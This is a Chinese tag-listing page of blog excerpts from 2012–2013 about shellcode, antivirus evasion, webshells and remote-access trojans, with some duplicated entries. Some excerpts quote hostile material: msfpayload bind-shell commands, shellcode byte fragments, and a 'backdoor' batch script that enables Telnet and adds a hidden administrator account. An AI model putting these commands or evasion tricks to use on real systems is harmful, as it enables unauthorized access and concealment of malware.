免杀Shellcode

安卓手机变砖了怎么办?先别砸了。。

博主用的魅族MX2,所以是个实实在在魅粉+安卓root控,平时捣鼓完日常的运维工作后就会找点安卓上有意思的APP研究下,这不这几天LEB安全大师(安卓公认的良心之作)又更新了,但苦于没有免杀版(也就是MX2
showerlee·2013-07-16 10:23

D3D游戏降帧的动态创建D3D设备以及ShellCode HOOK玩法

欢迎转载,转载请注明出处:http://blog.csdn.net/gnorth/article/details/9327971说白了,也就是HOOK掉Present,这种代码,其实百度上某些地方有,但是很多人估计不知道怎样得到Present的地址。所以就有些奇葩的例子:先到游戏的登录器内把CreateProcess之类的HOOK掉,让游戏进程暂停启动,然后注入游戏HOOK Direct3DCre
·2013-07-15 21:00

D3D游戏降帧的动态创建D3D设备以及ShellCode HOOK玩法

欢迎转载,转载请注明出处:http://blog.csdn.net/gnorth/article/details/9327971说白了,也就是HOOK掉Present,这种代码,其实百度上某些地方有,但是很多人估计不知道怎样得到Present的地址。所以就有些奇葩的例子:先到游戏的登录器内把CreateProcess之类的HOOK掉,让游戏进程暂停启动,然后注入游戏HOOKDirect3DCrea
gnorth·2013-07-15 08:51

Msfpayload

Msfpayloadmsfpayloadisacommand-lineinstanceofMetasploitthatisusedtogenerateandoutputallofthevarioustypesofshellcodethatareavailableinMetasploit.T
feier7501·2013-07-09 22:00

lcx源代码以及免杀的研究

之前和Random大神讨论了一下免杀的问题,他给出了一个比较不错的想法,使用debug版本发布可以过很多杀软。顺便看了下lcx的源码,发现其代码不算特别复杂,于是乎就在这分析一下。
wangyi_lin·2013-07-09 18:00

linux下shellcode提取常用到的命令

nasm -f elf xxx.asm    生成xxx.o文件   ld -o xxx  xxx.o  生成可执行文件,不用加参数-s ,否则在提取shellcode
·2013-07-07 21:00

网络安全:手动清除gh0st远控服务端

我们在做免杀或者在对gh0st大的修改的时候或者后门被意外破坏,不能用客户端自带的清除,这个时候就需要手动来清除。
太阳湾技术·2013-06-13 14:00

去后门免杀ASP木马程序集合【最新ASP木马】

http://down.51cto.com/data/820807去后门免杀ASP木马程序集合【最新ASP木马】刚从法克论坛收集的,还不错,后门已经去了,有一个f4ck.asp还带后门,不过没关系了,那个后门的域名早已经过期停用了
411161555·2013-06-02 21:16

智能手机创建的文件夹删除不了原因分析及清除方法

答:系统错误“无法删除文件,无法读源文件或磁盘”木马、病毒生会创建畸形文件夹,并将释放的文件存放于其中避免用户或是杀毒软件的清理已经不是什么新鲜的免杀手段,近期更是有许多的木马病毒启用了感染机制,将系统中正常的文件植入恶意代码
佚名·2013-05-30 11:14

33本逆向编程|加密解密|免杀|0day|反汇编|破解等电子书

33本逆向编程|加密解密|免杀|0day|反汇编|破解等电子书终级免杀.pdf http://www.ctdisk.com/file/14449697 文件加密全接触.pdf     http://www.ctdisk.com
LiSteven·2013-05-22 23:00

利用bt5和ollydbg来打开XP的shell

先产生shellcode:root@bt:~#msfpayloadwindows/shell/bind_tcpLPORT=443C /* *windows/shell/bind_tcp-298bytes
feier7501·2013-05-12 16:00

security cookie

在微软的c/c++编译器中,增加了对于栈溢出进行检测的参数“/GS”,在调试shellcode的时候,发现vs2005产生的code和vc6产生的code有些不同,才让我注意到这个问题。    
BoYueJiang·2013-05-10 00:00

Autobook中文版(四)

你可以把任意的shellcode写到‘configure.in’文件里,选择是非常多的。第一次使用Autoconf时可以会遇到以下疑问:什么是可移植的,什么不是可移植的?
地中海蒲公英·2013-05-08 07:00

Autobook中文版(四)

你可以把任意的shellcode写到‘configure.in’文件里,选择是非常多的。第一次使用Autoconf时可以会遇到以下疑问:什么是可移植的,什么不是可移植的?
wuzongbin2008·2013-05-03 06:01

metasploit产生shellcode

root@bt:~#msfpayloadwindows/shell/bind_tcpLPORT=443C /* *windows/shell/bind_tcp-298bytes(stage1) *http://www.metasploit.com *VERBOSE=false,LPORT=443,RHOST=,EXITFUNC=process, *InitialAutoRunScript=,Aut
feier7501·2013-05-01 22:00

制作免杀木马教程

一.关于免杀的来源为了让我们的木马在各种杀毒软件的威胁下活的更久.二.什么叫免杀和查杀,可分为二类:1.文件免杀和查杀:不运行程序用杀毒软件进行对该程序的扫描,所得结果。
okgogogo71315·2013-05-01 09:03

Protostar final0

Hints:dependingonwhereyouarereturningto,youmaywishtouseatoupper()proofshellcode.Sourcecode#include"..
terrying·2013-04-30 18:52

Protostar final0

Hints:dependingonwhereyouarereturningto,youmaywishtouseatoupper()proofshellcode.Sourcecode#include"..
terrying·2013-04-30 18:52

shellcode 16进制加解析python代码

/usr/bin/python  '''''      This is ascii  shellcode encode / decoder tool      programmer : gunslinger
luwenji309·2013-04-24 11:00

Protostar stack5

AboutStack5isastandardbufferoverflow,thistimeintroducingshellcode.Hints:Atthispointintime,itmightbeeasiertousesomeoneelsesshellcodeIfdebuggingtheshellcode
terrying·2013-04-14 02:56

Protostar stack5

AboutStack5isastandardbufferoverflow,thistimeintroducingshellcode.Hints:Atthispointintime,itmightbeeasiertousesomeoneelsesshellcodeIfdebuggingtheshellcode
terrying·2013-04-14 02:56

某厂商APT防御思路

使用已知的shellcode做一个特征库然后。。。
sincoder·2013-04-08 10:00

androidの开机启动service,避免杀

开机启动service避免杀死  (StartServiceByTimer)publicclassFirstBroadcastextendsBroadcastReceiver{ @Override publicvoidonReceive
xiabing082·2013-04-03 16:00

高级语言程序转换SHELLCODE时编码注意

使用VC写的DLL通过内存加载类,转成SHELLCODE,发现一个诡异的问题,程序直接运行操作与下载无任何问题,下载10G数据也不会出错。
chinafe·2013-03-23 18:00

诺顿(Norton)免杀账号

诺顿(Norton)这个东西做免杀,并不困难,如果是改代码免杀,很轻松,如果不改代码的情况下免杀也是可以的。原理简单说一下,诺顿(Norton)会判断文件的使用数量,信任程度,创建时间。
chinafe·2013-03-23 11:00

【Python】shellcode压栈指令生成工具

shellcode时的压栈指令方法相信大家使用得不少,只要懂得程序在调用函数时参数进栈的特点便很容易明白。
terrying·2013-03-16 00:07

识别病毒文件四个好方法

所以首先建议大家安装专业的杀毒软件,如瑞星全功能安全软件,可以做到只清除病毒不删除染毒文件,避免杀毒时删除重要文件的情况。另外笔者在这里介绍几个识别病毒
amio555·2013-03-14 18:11

使用C/Delphi编写ShellCode

  这里说的ShellCode指的是一段x86机器码,无需重定位,在内存任何位置都可以执行的代码.使用C/Delphi编写代码也是由其编译器特性决定的。
chinafe·2013-03-06 08:00

Linux ShellCode远程攻击原理

这里就以exit系统调用为例首先编写C代码,在GDB中使用disass_exit反汇编exit函数,之后迁移为汇编代码。section.text global_start _start: xoreax,eax xorebx,ebx moval,0x01 int0x80 之后只用如下nasm进行汇编,ld进行连接,生成可执行文件nasm-felfexit.asm ldexit.o-oexit exi
X_White·2013-02-27 23:00

PE型感染病毒 —— 增加节点修改PE入口 (3)

这套源码并非原创,而是参考llydd大佬的文章,通过在PE文件中增加新节点,并在新节中增入SHELLCODE来加载指定DLL从而实现XX....原文地址:http://bbs.pediy.com/showthread.php
zhongyunde·2013-02-27 23:00

免杀技术学习

如果你想学习免杀技术:第一部分:基础的汇编语言第二部分:修改工具(不指那些傻瓜式软件)。如:OllyDbg.PEditor.C32ASM.MYCCL复合特征码定位器。UE.OC.资源编辑器等。
cogbee·2013-02-25 21:00

Autobook中文版(四)

你可以把任意的shellcode写到‘configure.in’文件里,选择是非常多的。第一次使用Autoconf时可以会遇到以下疑问:什么是可移植的,什么不是可移植的?
DotNetFirst·2013-02-22 16:00

Things I want to know! update for ever

编程语言 coldfusion 安全/漏洞 metasploit, shellcode IT行业词汇 JBMP     WFMC工作流   &
dcj3sjt126com·2013-02-15 11:00

使用C/Delphi编写ShellCode

p=93  文章谈的很好这里说的ShellCode指的是一段x86机器码,无需重定位,在内存任何位置都可以执行的代码.使用C/Delphi编写代码也是由其编译器特性决定的。
BlAckEagle·2013-01-21 23:00

Ubuntu安装JDK及环境变量配置

至少,Ubuntu的开关机速度和免杀软就已经帅呆。目前,JDK是必须的,因为学习需要用到。我想,要是都能在Ubuntu上安装日常所需的工具,操作又
lihaiping_·2013-01-19 23:00

近年,在大陆做程序发布的特点

否则还得自己填点东西到自己的程序里面尽量做到免杀,确实不行,还得主动跟他们打招呼,孙子般求他们,恭恭敬敬地提供样本证明这个不是病毒。想把程序做小不容易,做小了,那几个国产免费杀毒软件就得说你是木马。
henysugar·2013-01-17 11:00

WIN7下可执行的ShellCode

#include #include intmain() { byteshellcode[]={ 0xE9,0x96,0x00,0x00,0x00,0x56,0x31,0xC9,0x64,0x8B,0x71,0x30,0x8B
cyousui·2013-01-16 21:00

简单缓冲区溢出示例

#include #include #include #include unsignedcharshellcode[]= "\xEB\x42\x8B\x59\x3C\x8B\x5C\x0B\x78\x03
cyousui·2013-01-16 20:00

shellcode获得kernel32基址的方法,win7,XP通用哦

       mov eax,fs:[30h]      mov eax,[eax+0ch]      mov eax,[eax+0ch]      mov eax,[eax]      mov eax,[eax]      mov edi,[eax+18h] 基址储存于edi中
wh6926981·2013-01-16 10:36

[8]技术浅谈——小刘的年底感想

小刘一直在忙着写他的WebHoleKit,这种攻击框架在国内还没有出现,对于IE的漏洞,SHELLCODE还不是很熟悉,小刘一直想写能够对杀软绕过和反侦测的模板,下载了Metasploit的Exp开发手册
BlAckEagle·2013-01-13 23:00

【经典源码】网络安全--远程控制--Gh0st3.6饭客网络sid版

Gh0st源码就我所知的有很多的版本,如洪流免杀版,红狼版,败笔版,我手头上的是  2010年5月份山东饭客论坛sid流放出的金牌gh0st版本。
Witch_Soya·2013-01-10 00:00

meterpreter 练习命令

Meterpreter开发利用1基本原理1.1预备知识MetasploitFramework是一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台,它集成了各种平台上常见的溢出漏洞和流行的shellcode
屋脊之上·2013-01-08 21:50

编写"优美"的SHELLCODE

编写"优美"的SHELLCODE作者:watercloud  主页:http://www.nsfocus.com日期:2002-1-4  SHELLCODE的活力在于其功能,如果在能够完成功能的前提下又能比较
jincm13·2012-12-31 14:00

Android Root方法原理解析及Hook(四) GingerBreak

和zergRush的攻击原理是一样的,其实zergRush的code部分源于GingerBreak,都是先使vold进程崩溃,从logcat拿到调试信息,然后让vold进程以root权限执行恶意的shellcode
LiSteven·2012-12-25 15:00

VC++ 实现增大可执行文件的体积 自定义文件大小

免杀的同学可能都会吧,增大文件体积防止云上传是个不错的方法功能界面:选择文件,是对话框支持文件拖放(详情见:http://blog.csdn.net/eldn__/article/details/8394060
eldn__·2012-12-23 20:00

免杀XP后门(适合菜鸟电脑)

xpbackdoor.bat内容如下 sc config tlntsvr start= auto net start tlntsvr net user myishacker 12345678 /add net localgroup administrators myishacker /add reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
xitong·2012-12-22 22:00

基于挂起进程修改eip办法dll注入笔记

主要思想:在进程启动时候,用CREATE_SUSPENDED挂起方式创建进程,或者打开进程之后把它挂起,然后申请一个内存空间,把shellcode写到该内存中,之后修改进程eip为shellcode的地址
LiSteven·2012-12-20 09:00

查看反汇编

对于一般只想让自己程序跑起来的程序员,这个命令没有更多意义,对于想进一步了解系统的程序员,应该掌握这种工具,至少你可以自己写写shellcode了,或者看看人家给的exploit中的shellcode是什么东西
heli007·2012-12-19 16:00

一句话网页木马汇总

ASP一句话1.2.3.免杀大部分网站的一句话4.免杀部分网站过略的一句话5.executerequest("YouPass")php一句话7.aspx一句话8.WebAdmin2Y.x.yaaaaa=
jinxingfeng_cn·2012-12-09 11:00

VBS加密14法你会几种 VBS加密免杀浅谈

手机打字实在在麻烦,所以一些比较简单或太复杂的代码我就不直接提供实例了。1、不是方法的方法--加注释加一些规则无用不含特征码的注释。代码略2、大小写混编利用VBS忽略大小写3、分行与同行混用利用冒号(:)连接多行代码为一行4、一行分多行使用续行符(_)将一行分多行写5、利用execute函数复制代码代码如下:Execute("createobject("&chr(34)&"wscript.shel
·2012-12-05 14:37
上一页 37 38 39 40 41 42 43 44 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他